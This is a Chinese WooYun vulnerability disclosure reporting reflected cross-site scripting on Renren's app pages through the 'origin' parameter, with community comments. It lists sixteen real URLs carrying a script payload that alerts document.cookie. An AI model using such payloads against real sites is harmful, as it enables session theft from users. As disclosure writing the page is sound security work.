当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07545

漏洞标题:人人网app站全部应用页面存在xss

相关厂商:人人网

漏洞作者: zeracker

提交时间:2012-05-26 15:09

修复时间:2012-05-26 15:09

公开时间:2012-05-26 15:09

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

作为SNS社区,你们的安全体系爆弱了。
人人网app站全部应用页面存在xss,每个应用都存在,是每个页面。
急于上线未做测试,但是后期也要做检查测试的吧?
6分是不让刷分,不代表安全级别只有6级。只是不想背刷分的头衔。

详细说明:

http://apps.renren.com/pvzsocial/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/chuanzhang/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/paopaoyu/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/dandanlong/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/qjiangsanguo/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/littlewar?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/boyaa_texas/?origin='"><script>alert(document.cookie;</script><"
http://apps.renren.com/rongcar/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/smsanguo/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/paopaoyu/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/qjiangsanguo/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/myprincess/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/manorage/?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/hongsejingjie?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/weisanguo?origin='"><script>alert(document.cookie);</script><"
http://apps.renren.com/friendetective?origin='"><script>alert(document.cookie);</script><"


暂时就贴这几个。更多的自己去测试了。
加上?origin='"><script>alert(document.cookie);</script><"<

漏洞证明:



修复方案:

将此站点下线,并进行安全排查。
增强管理体系,加强安全体系!
不要再让客服来解决安全问题。

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:3 (WooYun评价)


漏洞评价:

评论

  1. 2012-05-26 17:05 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    = = 原来被抛弃的后果,如此悲惨。。

  2. 2012-05-26 19:01 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    直接公开。。。,

  3. 2012-05-26 19:05 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    人人网想上市的话,网络安全应该是有要求的啊。怎么会如此不堪呢.

  4. 2012-05-26 20:48 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    对待安全的态度决定对用户的态度,公开以示惩戒!!!

  5. 2012-05-26 20:58 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @gainover 有突破浏览器filter的方法没

  6. 2012-05-26 21:19 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    额。。。人人悲剧了。。。

  7. 2012-05-26 23:12 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @livers 目前没什么太好的办法吧,FLASH的XSS可以过浏览器。

  8. 2012-05-27 21:21 | ( 路人 | Rank:11 漏洞数:3 | 专注网络安全)

    这个只是在低版本的IE浏览器上才可以实现

  9. 2012-05-28 08:09 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    小小船长,没擦掉